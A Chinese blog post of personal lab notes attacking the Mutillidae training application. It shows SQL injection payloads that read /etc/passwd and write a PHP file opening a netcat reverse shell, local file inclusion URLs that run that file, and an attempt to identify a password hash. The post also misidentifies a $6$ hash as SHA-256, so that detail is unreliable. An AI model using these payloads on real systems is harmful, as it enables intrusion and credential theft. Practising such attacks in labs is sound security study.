Chinaunix首页 | 论坛 | 博客
  • 博客访问: 1790168
  • 博文数量: 297
  • 博客积分: 285
  • 博客等级: 二等列兵
  • 技术积分: 3006
  • 用 户 组: 普通用户
  • 注册时间: 2010-03-06 22:04
个人简介

Linuxer, ex IBMer. GNU https://hmchzb19.github.io/

文章分类

全部博文(297)

文章存档

2020年(11)

2019年(15)

2018年(43)

2017年(79)

2016年(79)

2015年(58)

2014年(1)

2013年(8)

2012年(3)

分类: 网络与安全

2017-11-03 15:16:32

1. 使用sql injection read file and write file .
使用php的load_file函数来读取文件,成功的读取到了/etc/passwd,但是不能读取/etc/shadow. 我搞不清楚为什么.

点击(此处)折叠或打开

  1. http://192.168.0.119/mutillidae/index.php?page=user-info.php&username=kobe' union select 1,load_file("/etc/passwd"),null,null,null%23&password=aaa&user-info-php-submit-button=View+Account+Details
  2. ' union select 1,load_file("/etc/shadow"),null,null,null%23&password=aaa&user-info-php-submit-button=View+Account+Details

使用php的outfile()函数来write file .
首先在网页

点击(此处)折叠或打开

  1. http://192.168.0.119/mutillidae/index.php?page=user-info.php

中Name上写入:

点击(此处)折叠或打开

  1. kobe' union select null,'<?passthru("nc -e /bin/sh 192.168.0.104 8080");?>',null,null,null into outfile '/tmp/reverse.php #
password 留空,然后直接点击View Account Details, 意味着使用GET方式提交了数据后。在服务器端生成了/tmp/rever.php 文件。

2. 利用Local File Inclusion 漏洞运行该文件获得反弹shell.
我的Kali Linux IP地址为192.168.0.104. 在Kali 上监听8080端口

点击(此处)折叠或打开

  1. nc -vv -l -p 8080
然后打开网页,输入下面的地址. 就获得了一个反弹shell.

点击(此处)折叠或打开

  1. http://192.168.0.119/mutillidae/index.php?page=../../../../../tmp/reverse.php

3. Local file inclusion 最好玩的在于: 我可以直接浏览/etc/passwd 文件,但是当我尝试浏览/etc/shadow的时候,出现了报错. 如果获得了/etc/shadow文件的内容,那一定是件很美妙的事情.

点击(此处)折叠或打开

  1. http://192.168.0.119/mutillidae/index.php?page=../../../../../etc/passwd
  2. Warning: include(../../../../../etc/shadow) []: failed to open stream: Permission denied in /var/www/mutillidae/index.php on line 469
  3. Warning: include() []: Failed opening '../../../../../etc/shadow' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/mutillidae/index.php on line 469

4. eg:
我本机kali linux 的一个用户名叫jack, 密码为ass123.
打开/etc/shadow.   得到Jack的密码哈希, 这个哈希是怎么来的呢?使用hash-identifier 来检查,发现这是个SHA-256的散列, 可以尝试

点击(此处)折叠或打开

  1. jack:$6$P/OAszmX$q/Q6t6cFJS0yqEuK/Y0gbVeiE4hw7YXENeYI.vxf3KPFG4i2M3zCIUtjJyMHq7ozOd.hRvz/UhvsdjARM08f80:17473:0:99999:7:::
  2. hash-identifier
       #########################################################################
       #     __  __             __         ______    _____       #
       #    /\ \/\ \           /\ \     /\__  _\  /\  _ `\       #
       #    \ \ \_\ \     __      ____ \ \ \___    \/_/\ \/  \ \ \/\ \       #
       #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\       \ \ \   \ \ \ \ \       #
       #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \        \_\ \__ \ \ \_\ \       #
       #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/       #
       #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
       #                                 By Zion3R #
       #                             #
       #                               Root@Blackploit.com #
       #########################################################################

       -------------------------------------------------------------------------
     HASH: $6$P/OAszmX$q/Q6t6cFJS0yqEuK/Y0gbVeiE4hw7YXENeYI.vxf3KPFG4i2M3zCIUtjJyMHq7ozOd.hRvz/UhvsdjARM08f80

    Possible Hashs:
    [+]  SHA-256



但是我知道这个Hash应该是salted,加了盐,也许可以尝试用JohnTheRipper试试看.
或者查看下这个网站:


点击(此处)折叠或打开

  1. Sha-256 is a function of algorithm Sha-2 (as 384, 512, and more recently 224 bits versions), which is the evolution of Sha-1, itself an evolution of Sha-0. Sha-2 algorithm was developed by NSA to answer the security problem of Sha-1, since the theorical discover of a 2^63 operations for collisions. This algorithm takes as input a 2^64 maximum length message, and outputs a 256 bits hash. It seems that sha256 is becoming more and more used in order to replace the old md5 hash function. I think that sha256 is actually the best replacement because of its good balance between online storage size and security. As the others cryptographic functions of its "family", Sha-256 is unilateral so you can't find the plaintext with only the hash. You have to compare this hash to a online database, and that's what we do here with a 3,771,960,346 sha256 hash database. I looked for days to find any wordlist online. Then I computed for days to enlarge the wordlist and make it really unique.

还有一个网站做的挺好看,可惜SHA-256根本就不支持.

点击(此处)折叠或打开

  1. https://www.onlinehashcrack.com/



阅读(746) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~